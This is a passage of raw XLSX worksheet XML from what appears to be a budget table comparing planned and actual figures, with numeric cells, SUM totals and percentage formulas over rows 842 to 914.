      <c r="B842" s="100">
        <v>5</v>
      </c>
      <c r="C842" s="100">
        <v>5</v>
      </c>
      <c r="D842" s="100">
        <v>0</v>
      </c>
      <c r="E842" s="173"/>
      <c r="F842" s="174">
        <f>E842/C842*100</f>
        <v>0</v>
      </c>
      <c r="G842" s="172"/>
    </row>
    <row r="843" spans="1:7" ht="17.25" customHeight="1">
      <c r="A843" s="128" t="s">
        <v>1002</v>
      </c>
      <c r="B843" s="100">
        <v>62</v>
      </c>
      <c r="C843" s="100">
        <v>52</v>
      </c>
      <c r="D843" s="100">
        <v>60</v>
      </c>
      <c r="E843" s="173">
        <v>60</v>
      </c>
      <c r="F843" s="174">
        <f>E843/C843*100</f>
        <v>115.38461538461537</v>
      </c>
      <c r="G843" s="172"/>
    </row>
    <row r="844" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A844" s="128" t="s">
        <v>1003</v>
      </c>
      <c r="B844" s="100">
        <v>0</v>
      </c>
      <c r="C844" s="100"/>
      <c r="D844" s="100">
        <v>0</v>
      </c>
      <c r="E844" s="173"/>
      <c r="F844" s="174"/>
      <c r="G844" s="172"/>
    </row>
    <row r="845" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A845" s="128" t="s">
        <v>1004</v>
      </c>
      <c r="B845" s="100">
        <v>0</v>
      </c>
      <c r="C845" s="100"/>
      <c r="D845" s="100">
        <v>0</v>
      </c>
      <c r="E845" s="173"/>
      <c r="F845" s="174"/>
      <c r="G845" s="172"/>
    </row>
    <row r="846" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A846" s="128" t="s">
        <v>1005</v>
      </c>
      <c r="B846" s="100">
        <v>0</v>
      </c>
      <c r="C846" s="100"/>
      <c r="D846" s="100">
        <v>0</v>
      </c>
      <c r="E846" s="173"/>
      <c r="F846" s="174"/>
      <c r="G846" s="172"/>
    </row>
    <row r="847" spans="1:7" ht="17.25" customHeight="1">
      <c r="A847" s="128" t="s">
        <v>1006</v>
      </c>
      <c r="B847" s="100">
        <v>0</v>
      </c>
      <c r="C847" s="100"/>
      <c r="D847" s="100">
        <v>44</v>
      </c>
      <c r="E847" s="173">
        <v>44</v>
      </c>
      <c r="F847" s="174"/>
      <c r="G847" s="172"/>
    </row>
    <row r="848" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A848" s="128" t="s">
        <v>1007</v>
      </c>
      <c r="B848" s="100">
        <v>0</v>
      </c>
      <c r="C848" s="100"/>
      <c r="D848" s="100">
        <v>0</v>
      </c>
      <c r="E848" s="173"/>
      <c r="F848" s="174"/>
      <c r="G848" s="172"/>
    </row>
    <row r="849" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A849" s="128" t="s">
        <v>1008</v>
      </c>
      <c r="B849" s="100">
        <v>0</v>
      </c>
      <c r="C849" s="100"/>
      <c r="D849" s="100">
        <v>0</v>
      </c>
      <c r="E849" s="173"/>
      <c r="F849" s="174"/>
      <c r="G849" s="172"/>
    </row>
    <row r="850" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A850" s="128" t="s">
        <v>1009</v>
      </c>
      <c r="B850" s="100">
        <v>0</v>
      </c>
      <c r="C850" s="100"/>
      <c r="D850" s="100">
        <v>0</v>
      </c>
      <c r="E850" s="173"/>
      <c r="F850" s="174"/>
      <c r="G850" s="172"/>
    </row>
    <row r="851" spans="1:7" ht="17.25" customHeight="1">
      <c r="A851" s="128" t="s">
        <v>1010</v>
      </c>
      <c r="B851" s="100">
        <v>20</v>
      </c>
      <c r="C851" s="100">
        <v>20</v>
      </c>
      <c r="D851" s="100">
        <v>15</v>
      </c>
      <c r="E851" s="173"/>
      <c r="F851" s="174">
        <f aca="true" t="shared" si="53" ref="F851:F857">E851/C851*100</f>
        <v>0</v>
      </c>
      <c r="G851" s="172"/>
    </row>
    <row r="852" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A852" s="128" t="s">
        <v>1011</v>
      </c>
      <c r="B852" s="100">
        <v>0</v>
      </c>
      <c r="C852" s="100"/>
      <c r="D852" s="100">
        <v>0</v>
      </c>
      <c r="E852" s="173"/>
      <c r="F852" s="174"/>
      <c r="G852" s="172"/>
    </row>
    <row r="853" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A853" s="128" t="s">
        <v>1012</v>
      </c>
      <c r="B853" s="100">
        <v>0</v>
      </c>
      <c r="C853" s="100"/>
      <c r="D853" s="100">
        <v>0</v>
      </c>
      <c r="E853" s="173"/>
      <c r="F853" s="174"/>
      <c r="G853" s="172"/>
    </row>
    <row r="854" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A854" s="128" t="s">
        <v>978</v>
      </c>
      <c r="B854" s="100">
        <v>0</v>
      </c>
      <c r="C854" s="100"/>
      <c r="D854" s="100">
        <v>0</v>
      </c>
      <c r="E854" s="173"/>
      <c r="F854" s="174"/>
      <c r="G854" s="172"/>
    </row>
    <row r="855" spans="1:7" ht="17.25" customHeight="1">
      <c r="A855" s="128" t="s">
        <v>1013</v>
      </c>
      <c r="B855" s="100">
        <v>102</v>
      </c>
      <c r="C855" s="100">
        <v>30</v>
      </c>
      <c r="D855" s="100">
        <v>324</v>
      </c>
      <c r="E855" s="173">
        <v>132</v>
      </c>
      <c r="F855" s="174">
        <f t="shared" si="53"/>
        <v>440.00000000000006</v>
      </c>
      <c r="G855" s="172"/>
    </row>
    <row r="856" spans="1:7" ht="17.25" customHeight="1">
      <c r="A856" s="128" t="s">
        <v>1014</v>
      </c>
      <c r="B856" s="100">
        <f>SUM(B857:B883)</f>
        <v>16148</v>
      </c>
      <c r="C856" s="100">
        <f>SUM(C857:C883)</f>
        <v>3828</v>
      </c>
      <c r="D856" s="100">
        <f>SUM(D857:D883)</f>
        <v>9655</v>
      </c>
      <c r="E856" s="173">
        <f>SUM(E857:E883)</f>
        <v>3534</v>
      </c>
      <c r="F856" s="174">
        <f t="shared" si="53"/>
        <v>92.31974921630093</v>
      </c>
      <c r="G856" s="172"/>
    </row>
    <row r="857" spans="1:7" ht="17.25" customHeight="1">
      <c r="A857" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B857" s="100">
        <v>1429</v>
      </c>
      <c r="C857" s="100">
        <v>1429</v>
      </c>
      <c r="D857" s="100">
        <v>1185</v>
      </c>
      <c r="E857" s="173">
        <v>1185</v>
      </c>
      <c r="F857" s="174">
        <f t="shared" si="53"/>
        <v>82.92512246326102</v>
      </c>
      <c r="G857" s="172"/>
    </row>
    <row r="858" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A858" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B858" s="100">
        <v>0</v>
      </c>
      <c r="C858" s="100"/>
      <c r="D858" s="100">
        <v>0</v>
      </c>
      <c r="E858" s="173"/>
      <c r="F858" s="174"/>
      <c r="G858" s="172"/>
    </row>
    <row r="859" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A859" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B859" s="100">
        <v>0</v>
      </c>
      <c r="C859" s="100"/>
      <c r="D859" s="100">
        <v>0</v>
      </c>
      <c r="E859" s="173"/>
      <c r="F859" s="174"/>
      <c r="G859" s="172"/>
    </row>
    <row r="860" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A860" s="128" t="s">
        <v>1015</v>
      </c>
      <c r="B860" s="100">
        <v>0</v>
      </c>
      <c r="C860" s="100"/>
      <c r="D860" s="100">
        <v>0</v>
      </c>
      <c r="E860" s="173"/>
      <c r="F860" s="174"/>
      <c r="G860" s="172"/>
    </row>
    <row r="861" spans="1:7" ht="17.25" customHeight="1">
      <c r="A861" s="128" t="s">
        <v>1016</v>
      </c>
      <c r="B861" s="100">
        <v>661</v>
      </c>
      <c r="C861" s="100">
        <v>163</v>
      </c>
      <c r="D861" s="100">
        <v>121</v>
      </c>
      <c r="E861" s="173"/>
      <c r="F861" s="174">
        <f aca="true" t="shared" si="54" ref="F861:F864">E861/C861*100</f>
        <v>0</v>
      </c>
      <c r="G861" s="172"/>
    </row>
    <row r="862" spans="1:7" ht="17.25" customHeight="1">
      <c r="A862" s="128" t="s">
        <v>1017</v>
      </c>
      <c r="B862" s="100">
        <v>452</v>
      </c>
      <c r="C862" s="100">
        <v>452</v>
      </c>
      <c r="D862" s="100">
        <v>467</v>
      </c>
      <c r="E862" s="173">
        <v>467</v>
      </c>
      <c r="F862" s="174">
        <f t="shared" si="54"/>
        <v>103.31858407079646</v>
      </c>
      <c r="G862" s="172"/>
    </row>
    <row r="863" spans="1:7" ht="17.25" customHeight="1">
      <c r="A863" s="128" t="s">
        <v>1018</v>
      </c>
      <c r="B863" s="100">
        <v>0</v>
      </c>
      <c r="C863" s="100"/>
      <c r="D863" s="100">
        <v>0</v>
      </c>
      <c r="E863" s="173"/>
      <c r="F863" s="174"/>
      <c r="G863" s="172"/>
    </row>
    <row r="864" spans="1:7" ht="17.25" customHeight="1">
      <c r="A864" s="128" t="s">
        <v>1019</v>
      </c>
      <c r="B864" s="100">
        <v>168</v>
      </c>
      <c r="C864" s="100">
        <v>168</v>
      </c>
      <c r="D864" s="100">
        <v>52</v>
      </c>
      <c r="E864" s="173">
        <v>52</v>
      </c>
      <c r="F864" s="174">
        <f t="shared" si="54"/>
        <v>30.952380952380953</v>
      </c>
      <c r="G864" s="172"/>
    </row>
    <row r="865" spans="1:7" ht="17.25" customHeight="1">
      <c r="A865" s="128" t="s">
        <v>1020</v>
      </c>
      <c r="B865" s="100">
        <v>0</v>
      </c>
      <c r="C865" s="100"/>
      <c r="D865" s="100">
        <v>0</v>
      </c>
      <c r="E865" s="173"/>
      <c r="F865" s="174"/>
      <c r="G865" s="172"/>
    </row>
    <row r="866" spans="1:7" ht="17.25" customHeight="1">
      <c r="A866" s="128" t="s">
        <v>1021</v>
      </c>
      <c r="B866" s="100">
        <v>0</v>
      </c>
      <c r="C866" s="100"/>
      <c r="D866" s="100">
        <v>1400</v>
      </c>
      <c r="E866" s="173">
        <v>400</v>
      </c>
      <c r="F866" s="174"/>
      <c r="G866" s="172"/>
    </row>
    <row r="867" spans="1:7" ht="17.25" customHeight="1">
      <c r="A867" s="128" t="s">
        <v>1022</v>
      </c>
      <c r="B867" s="100">
        <v>796</v>
      </c>
      <c r="C867" s="100">
        <v>796</v>
      </c>
      <c r="D867" s="100">
        <v>5640</v>
      </c>
      <c r="E867" s="173">
        <v>640</v>
      </c>
      <c r="F867" s="174">
        <f aca="true" t="shared" si="55" ref="F867:F870">E867/C867*100</f>
        <v>80.40201005025126</v>
      </c>
      <c r="G867" s="172"/>
    </row>
    <row r="868" spans="1:7" ht="17.25" customHeight="1">
      <c r="A868" s="128" t="s">
        <v>1023</v>
      </c>
      <c r="B868" s="100">
        <v>30</v>
      </c>
      <c r="C868" s="100">
        <v>30</v>
      </c>
      <c r="D868" s="100">
        <v>30</v>
      </c>
      <c r="E868" s="173">
        <v>30</v>
      </c>
      <c r="F868" s="174">
        <f t="shared" si="55"/>
        <v>100</v>
      </c>
      <c r="G868" s="172"/>
    </row>
    <row r="869" spans="1:7" ht="17.25" customHeight="1">
      <c r="A869" s="128" t="s">
        <v>1024</v>
      </c>
      <c r="B869" s="100">
        <v>0</v>
      </c>
      <c r="C869" s="100"/>
      <c r="D869" s="100">
        <v>0</v>
      </c>
      <c r="E869" s="173"/>
      <c r="F869" s="174"/>
      <c r="G869" s="172"/>
    </row>
    <row r="870" spans="1:7" ht="17.25" customHeight="1">
      <c r="A870" s="128" t="s">
        <v>1025</v>
      </c>
      <c r="B870" s="100">
        <v>200</v>
      </c>
      <c r="C870" s="100">
        <v>200</v>
      </c>
      <c r="D870" s="100">
        <v>120</v>
      </c>
      <c r="E870" s="173">
        <v>120</v>
      </c>
      <c r="F870" s="174">
        <f t="shared" si="55"/>
        <v>60</v>
      </c>
      <c r="G870" s="172"/>
    </row>
    <row r="871" spans="1:7" ht="17.25" customHeight="1">
      <c r="A871" s="128" t="s">
        <v>1026</v>
      </c>
      <c r="B871" s="100">
        <v>0</v>
      </c>
      <c r="C871" s="100"/>
      <c r="D871" s="100">
        <v>0</v>
      </c>
      <c r="E871" s="173"/>
      <c r="F871" s="174"/>
      <c r="G871" s="172"/>
    </row>
    <row r="872" spans="1:7" ht="17.25" customHeight="1">
      <c r="A872" s="128" t="s">
        <v>1027</v>
      </c>
      <c r="B872" s="100">
        <v>5</v>
      </c>
      <c r="C872" s="100">
        <v>5</v>
      </c>
      <c r="D872" s="100">
        <v>5</v>
      </c>
      <c r="E872" s="173">
        <v>5</v>
      </c>
      <c r="F872" s="174">
        <f>E872/C872*100</f>
        <v>100</v>
      </c>
      <c r="G872" s="172"/>
    </row>
    <row r="873" spans="1:7" ht="17.25" customHeight="1">
      <c r="A873" s="128" t="s">
        <v>1028</v>
      </c>
      <c r="B873" s="100">
        <v>0</v>
      </c>
      <c r="C873" s="100"/>
      <c r="D873" s="100">
        <v>0</v>
      </c>
      <c r="E873" s="173"/>
      <c r="F873" s="174"/>
      <c r="G873" s="172"/>
    </row>
    <row r="874" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A874" s="128" t="s">
        <v>1029</v>
      </c>
      <c r="B874" s="100">
        <v>0</v>
      </c>
      <c r="C874" s="100"/>
      <c r="D874" s="100">
        <v>0</v>
      </c>
      <c r="E874" s="173"/>
      <c r="F874" s="174"/>
      <c r="G874" s="172"/>
    </row>
    <row r="875" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A875" s="128" t="s">
        <v>1030</v>
      </c>
      <c r="B875" s="100">
        <v>0</v>
      </c>
      <c r="C875" s="100"/>
      <c r="D875" s="100">
        <v>0</v>
      </c>
      <c r="E875" s="173"/>
      <c r="F875" s="174"/>
      <c r="G875" s="172"/>
    </row>
    <row r="876" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A876" s="128" t="s">
        <v>1031</v>
      </c>
      <c r="B876" s="100">
        <v>0</v>
      </c>
      <c r="C876" s="100"/>
      <c r="D876" s="100">
        <v>0</v>
      </c>
      <c r="E876" s="173"/>
      <c r="F876" s="174"/>
      <c r="G876" s="172"/>
    </row>
    <row r="877" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A877" s="128" t="s">
        <v>1032</v>
      </c>
      <c r="B877" s="100">
        <v>0</v>
      </c>
      <c r="C877" s="100"/>
      <c r="D877" s="100">
        <v>0</v>
      </c>
      <c r="E877" s="173"/>
      <c r="F877" s="174"/>
      <c r="G877" s="172"/>
    </row>
    <row r="878" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A878" s="128" t="s">
        <v>1006</v>
      </c>
      <c r="B878" s="100">
        <v>0</v>
      </c>
      <c r="C878" s="100"/>
      <c r="D878" s="100">
        <v>0</v>
      </c>
      <c r="E878" s="173"/>
      <c r="F878" s="174"/>
      <c r="G878" s="172"/>
    </row>
    <row r="879" spans="1:7" ht="17.25" customHeight="1">
      <c r="A879" s="128" t="s">
        <v>1033</v>
      </c>
      <c r="B879" s="100">
        <v>5310</v>
      </c>
      <c r="C879" s="100"/>
      <c r="D879" s="100">
        <v>0</v>
      </c>
      <c r="E879" s="173"/>
      <c r="F879" s="174"/>
      <c r="G879" s="172"/>
    </row>
    <row r="880" spans="1:7" ht="17.25" customHeight="1">
      <c r="A880" s="128" t="s">
        <v>1034</v>
      </c>
      <c r="B880" s="100">
        <v>500</v>
      </c>
      <c r="C880" s="100">
        <v>500</v>
      </c>
      <c r="D880" s="100">
        <v>500</v>
      </c>
      <c r="E880" s="173">
        <v>500</v>
      </c>
      <c r="F880" s="174">
        <f aca="true" t="shared" si="56" ref="F880:F884">E880/C880*100</f>
        <v>100</v>
      </c>
      <c r="G880" s="172"/>
    </row>
    <row r="881" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A881" s="128" t="s">
        <v>1035</v>
      </c>
      <c r="B881" s="100"/>
      <c r="C881" s="100"/>
      <c r="D881" s="100">
        <v>0</v>
      </c>
      <c r="E881" s="173"/>
      <c r="F881" s="174"/>
      <c r="G881" s="172"/>
    </row>
    <row r="882" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A882" s="128" t="s">
        <v>1036</v>
      </c>
      <c r="B882" s="100"/>
      <c r="C882" s="100"/>
      <c r="D882" s="100">
        <v>0</v>
      </c>
      <c r="E882" s="173"/>
      <c r="F882" s="174"/>
      <c r="G882" s="172"/>
    </row>
    <row r="883" spans="1:7" ht="17.25" customHeight="1">
      <c r="A883" s="128" t="s">
        <v>1037</v>
      </c>
      <c r="B883" s="100">
        <v>6597</v>
      </c>
      <c r="C883" s="100">
        <v>85</v>
      </c>
      <c r="D883" s="100">
        <v>135</v>
      </c>
      <c r="E883" s="173">
        <v>135</v>
      </c>
      <c r="F883" s="174">
        <f t="shared" si="56"/>
        <v>158.8235294117647</v>
      </c>
      <c r="G883" s="172"/>
    </row>
    <row r="884" spans="1:7" ht="17.25" customHeight="1">
      <c r="A884" s="128" t="s">
        <v>1038</v>
      </c>
      <c r="B884" s="100">
        <f>SUM(B885:B894)</f>
        <v>7810</v>
      </c>
      <c r="C884" s="100">
        <f>SUM(C885:C894)</f>
        <v>3810</v>
      </c>
      <c r="D884" s="100">
        <f>SUM(D885:D894)</f>
        <v>10615</v>
      </c>
      <c r="E884" s="173">
        <f>SUM(E885:E894)</f>
        <v>4615</v>
      </c>
      <c r="F884" s="174">
        <f t="shared" si="56"/>
        <v>121.12860892388451</v>
      </c>
      <c r="G884" s="172"/>
    </row>
    <row r="885" spans="1:7" ht="17.25" customHeight="1">
      <c r="A885" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B885" s="100">
        <v>0</v>
      </c>
      <c r="C885" s="100"/>
      <c r="D885" s="100">
        <v>154</v>
      </c>
      <c r="E885" s="173">
        <v>154</v>
      </c>
      <c r="F885" s="174"/>
      <c r="G885" s="172"/>
    </row>
    <row r="886" spans="1:7" ht="17.25" customHeight="1">
      <c r="A886" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B886" s="100">
        <v>0</v>
      </c>
      <c r="C886" s="100"/>
      <c r="D886" s="100">
        <v>0</v>
      </c>
      <c r="E886" s="173"/>
      <c r="F886" s="174"/>
      <c r="G886" s="172"/>
    </row>
    <row r="887" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A887" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B887" s="100">
        <v>0</v>
      </c>
      <c r="C887" s="100"/>
      <c r="D887" s="100">
        <v>0</v>
      </c>
      <c r="E887" s="173"/>
      <c r="F887" s="174"/>
      <c r="G887" s="172"/>
    </row>
    <row r="888" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A888" s="128" t="s">
        <v>1039</v>
      </c>
      <c r="B888" s="100">
        <v>0</v>
      </c>
      <c r="C888" s="100"/>
      <c r="D888" s="100">
        <v>0</v>
      </c>
      <c r="E888" s="173"/>
      <c r="F888" s="174"/>
      <c r="G888" s="172"/>
    </row>
    <row r="889" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A889" s="128" t="s">
        <v>1040</v>
      </c>
      <c r="B889" s="100">
        <v>0</v>
      </c>
      <c r="C889" s="100"/>
      <c r="D889" s="100">
        <v>0</v>
      </c>
      <c r="E889" s="173"/>
      <c r="F889" s="174"/>
      <c r="G889" s="172"/>
    </row>
    <row r="890" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A890" s="128" t="s">
        <v>1041</v>
      </c>
      <c r="B890" s="100">
        <v>0</v>
      </c>
      <c r="C890" s="100"/>
      <c r="D890" s="100">
        <v>0</v>
      </c>
      <c r="E890" s="173"/>
      <c r="F890" s="174"/>
      <c r="G890" s="172"/>
    </row>
    <row r="891" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A891" s="128" t="s">
        <v>1042</v>
      </c>
      <c r="B891" s="100">
        <v>0</v>
      </c>
      <c r="C891" s="100"/>
      <c r="D891" s="100">
        <v>0</v>
      </c>
      <c r="E891" s="173"/>
      <c r="F891" s="174"/>
      <c r="G891" s="172"/>
    </row>
    <row r="892" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A892" s="128" t="s">
        <v>1043</v>
      </c>
      <c r="B892" s="100">
        <v>0</v>
      </c>
      <c r="C892" s="100"/>
      <c r="D892" s="100">
        <v>0</v>
      </c>
      <c r="E892" s="173"/>
      <c r="F892" s="174"/>
      <c r="G892" s="172"/>
    </row>
    <row r="893" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A893" s="128" t="s">
        <v>1044</v>
      </c>
      <c r="B893" s="100">
        <v>0</v>
      </c>
      <c r="C893" s="100"/>
      <c r="D893" s="100">
        <v>0</v>
      </c>
      <c r="E893" s="173"/>
      <c r="F893" s="174"/>
      <c r="G893" s="172"/>
    </row>
    <row r="894" spans="1:7" ht="17.25" customHeight="1">
      <c r="A894" s="128" t="s">
        <v>1045</v>
      </c>
      <c r="B894" s="100">
        <f>6810+1000</f>
        <v>7810</v>
      </c>
      <c r="C894" s="100">
        <f>2810+1000</f>
        <v>3810</v>
      </c>
      <c r="D894" s="100">
        <v>10461</v>
      </c>
      <c r="E894" s="173">
        <v>4461</v>
      </c>
      <c r="F894" s="174">
        <f aca="true" t="shared" si="57" ref="F894:F896">E894/C894*100</f>
        <v>117.08661417322834</v>
      </c>
      <c r="G894" s="172"/>
    </row>
    <row r="895" spans="1:7" ht="17.25" customHeight="1">
      <c r="A895" s="128" t="s">
        <v>1046</v>
      </c>
      <c r="B895" s="100">
        <f>SUM(B896:B901)</f>
        <v>1600</v>
      </c>
      <c r="C895" s="100">
        <f>SUM(C896:C901)</f>
        <v>4531</v>
      </c>
      <c r="D895" s="100">
        <f>SUM(D896:D901)</f>
        <v>8575</v>
      </c>
      <c r="E895" s="173">
        <f>SUM(E896:E901)</f>
        <v>5131</v>
      </c>
      <c r="F895" s="174">
        <f t="shared" si="57"/>
        <v>113.24210990951225</v>
      </c>
      <c r="G895" s="172"/>
    </row>
    <row r="896" spans="1:7" ht="17.25" customHeight="1">
      <c r="A896" s="128" t="s">
        <v>1047</v>
      </c>
      <c r="B896" s="100">
        <v>600</v>
      </c>
      <c r="C896" s="100">
        <v>600</v>
      </c>
      <c r="D896" s="100">
        <v>3600</v>
      </c>
      <c r="E896" s="173">
        <v>600</v>
      </c>
      <c r="F896" s="174">
        <f t="shared" si="57"/>
        <v>100</v>
      </c>
      <c r="G896" s="172"/>
    </row>
    <row r="897" spans="1:7" ht="17.25" customHeight="1">
      <c r="A897" s="128" t="s">
        <v>1048</v>
      </c>
      <c r="B897" s="100">
        <v>0</v>
      </c>
      <c r="C897" s="100"/>
      <c r="D897" s="100">
        <v>0</v>
      </c>
      <c r="E897" s="173"/>
      <c r="F897" s="174"/>
      <c r="G897" s="172"/>
    </row>
    <row r="898" spans="1:7" ht="17.25" customHeight="1">
      <c r="A898" s="128" t="s">
        <v>1049</v>
      </c>
      <c r="B898" s="100"/>
      <c r="C898" s="100">
        <v>2931</v>
      </c>
      <c r="D898" s="100"/>
      <c r="E898" s="173">
        <v>2931</v>
      </c>
      <c r="F898" s="174">
        <f aca="true" t="shared" si="58" ref="F898:F902">E898/C898*100</f>
        <v>100</v>
      </c>
      <c r="G898" s="172"/>
    </row>
    <row r="899" spans="1:7" ht="17.25" customHeight="1">
      <c r="A899" s="128" t="s">
        <v>1050</v>
      </c>
      <c r="B899" s="100">
        <v>1000</v>
      </c>
      <c r="C899" s="100">
        <v>1000</v>
      </c>
      <c r="D899" s="100">
        <v>4975</v>
      </c>
      <c r="E899" s="173">
        <v>1600</v>
      </c>
      <c r="F899" s="174">
        <f t="shared" si="58"/>
        <v>160</v>
      </c>
      <c r="G899" s="172"/>
    </row>
    <row r="900" spans="1:7" ht="17.25" customHeight="1">
      <c r="A900" s="128" t="s">
        <v>1051</v>
      </c>
      <c r="B900" s="100">
        <v>0</v>
      </c>
      <c r="C900" s="100"/>
      <c r="D900" s="100">
        <v>0</v>
      </c>
      <c r="E900" s="173"/>
      <c r="F900" s="174"/>
      <c r="G900" s="172"/>
    </row>
    <row r="901" spans="1:7" ht="17.25" customHeight="1">
      <c r="A901" s="128" t="s">
        <v>1052</v>
      </c>
      <c r="B901" s="100">
        <v>0</v>
      </c>
      <c r="C901" s="100"/>
      <c r="D901" s="100">
        <v>0</v>
      </c>
      <c r="E901" s="173"/>
      <c r="F901" s="174"/>
      <c r="G901" s="172"/>
    </row>
    <row r="902" spans="1:7" ht="17.25" customHeight="1">
      <c r="A902" s="128" t="s">
        <v>1053</v>
      </c>
      <c r="B902" s="100">
        <f>SUM(B903:B908)</f>
        <v>1286</v>
      </c>
      <c r="C902" s="100">
        <f>SUM(C903:C908)</f>
        <v>1160</v>
      </c>
      <c r="D902" s="100">
        <f>SUM(D903:D908)</f>
        <v>2753</v>
      </c>
      <c r="E902" s="173">
        <f>SUM(E903:E908)</f>
        <v>1280</v>
      </c>
      <c r="F902" s="174">
        <f t="shared" si="58"/>
        <v>110.34482758620689</v>
      </c>
      <c r="G902" s="172"/>
    </row>
    <row r="903" spans="1:7" ht="17.25" customHeight="1">
      <c r="A903" s="128" t="s">
        <v>1054</v>
      </c>
      <c r="B903" s="100">
        <v>0</v>
      </c>
      <c r="C903" s="100"/>
      <c r="D903" s="100">
        <v>447</v>
      </c>
      <c r="E903" s="173">
        <v>150</v>
      </c>
      <c r="F903" s="174"/>
      <c r="G903" s="172"/>
    </row>
    <row r="904" spans="1:7" ht="17.25" customHeight="1">
      <c r="A904" s="128" t="s">
        <v>1055</v>
      </c>
      <c r="B904" s="100">
        <v>0</v>
      </c>
      <c r="C904" s="100"/>
      <c r="D904" s="100">
        <v>0</v>
      </c>
      <c r="E904" s="173"/>
      <c r="F904" s="174"/>
      <c r="G904" s="172"/>
    </row>
    <row r="905" spans="1:7" ht="17.25" customHeight="1">
      <c r="A905" s="128" t="s">
        <v>1056</v>
      </c>
      <c r="B905" s="100">
        <f>13+1160</f>
        <v>1173</v>
      </c>
      <c r="C905" s="100">
        <v>1160</v>
      </c>
      <c r="D905" s="100">
        <v>2217</v>
      </c>
      <c r="E905" s="173">
        <v>1130</v>
      </c>
      <c r="F905" s="174">
        <f>E905/C905*100</f>
        <v>97.41379310344827</v>
      </c>
      <c r="G905" s="172"/>
    </row>
    <row r="906" spans="1:7" ht="17.25" customHeight="1">
      <c r="A906" s="128" t="s">
        <v>1057</v>
      </c>
      <c r="B906" s="100">
        <v>113</v>
      </c>
      <c r="C906" s="100"/>
      <c r="D906" s="100">
        <v>89</v>
      </c>
      <c r="E906" s="173"/>
      <c r="F906" s="174"/>
      <c r="G906" s="172"/>
    </row>
    <row r="907" spans="1:7" ht="17.25" customHeight="1">
      <c r="A907" s="128" t="s">
        <v>1058</v>
      </c>
      <c r="B907" s="100">
        <v>0</v>
      </c>
      <c r="C907" s="100"/>
      <c r="D907" s="100">
        <v>0</v>
      </c>
      <c r="E907" s="173"/>
      <c r="F907" s="174"/>
      <c r="G907" s="172"/>
    </row>
    <row r="908" spans="1:7" ht="17.25" customHeight="1">
      <c r="A908" s="128" t="s">
        <v>1059</v>
      </c>
      <c r="B908" s="100"/>
      <c r="C908" s="100"/>
      <c r="D908" s="100">
        <v>0</v>
      </c>
      <c r="E908" s="173"/>
      <c r="F908" s="174"/>
      <c r="G908" s="172"/>
    </row>
    <row r="909" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A909" s="128" t="s">
        <v>1060</v>
      </c>
      <c r="B909" s="100">
        <f>SUM(B910:B911)</f>
        <v>0</v>
      </c>
      <c r="C909" s="100">
        <f>SUM(C910:C911)</f>
        <v>0</v>
      </c>
      <c r="D909" s="100">
        <f>SUM(D910:D911)</f>
        <v>0</v>
      </c>
      <c r="E909" s="173">
        <f>SUM(E910:E911)</f>
        <v>0</v>
      </c>
      <c r="F909" s="174"/>
      <c r="G909" s="172"/>
    </row>
    <row r="910" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A910" s="128" t="s">
        <v>1061</v>
      </c>
      <c r="B910" s="100"/>
      <c r="C910" s="100"/>
      <c r="D910" s="100">
        <v>0</v>
      </c>
      <c r="E910" s="173"/>
      <c r="F910" s="174"/>
      <c r="G910" s="172"/>
    </row>
    <row r="911" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A911" s="128" t="s">
        <v>1062</v>
      </c>
      <c r="B911" s="100"/>
      <c r="C911" s="100"/>
      <c r="D911" s="100">
        <v>0</v>
      </c>
      <c r="E911" s="173"/>
      <c r="F911" s="174"/>
      <c r="G911" s="172"/>
    </row>
    <row r="912" spans="1:7" ht="17.25" customHeight="1">
      <c r="A912" s="128" t="s">
        <v>1063</v>
      </c>
      <c r="B912" s="100">
        <f>SUM(B913:B914)</f>
        <v>1131</v>
      </c>
      <c r="C912" s="100">
        <f>SUM(C913:C914)</f>
        <v>0</v>
      </c>
      <c r="D912" s="100">
        <f>SUM(D913:D914)</f>
        <v>0</v>
      </c>
      <c r="E912" s="173">
        <f>SUM(E913:E914)</f>
        <v>0</v>
      </c>
      <c r="F912" s="174"/>
      <c r="G912" s="172"/>
    </row>
    <row r="913" spans="1:7" ht="17.25" customHeight="1">
      <c r="A913" s="128" t="s">
        <v>1064</v>
      </c>
      <c r="B913" s="100"/>
      <c r="C913" s="100"/>
      <c r="D913" s="100">
        <v>0</v>
      </c>
      <c r="E913" s="173"/>
      <c r="F913" s="174"/>
      <c r="G913" s="172"/>
    </row>
    <row r="914" spans="1:7" ht="17.25" customHeight="1">
      <c r="A914" s="128" t="s">
        <v>1065</v>
      </c>
      <c r="B914" s="100">
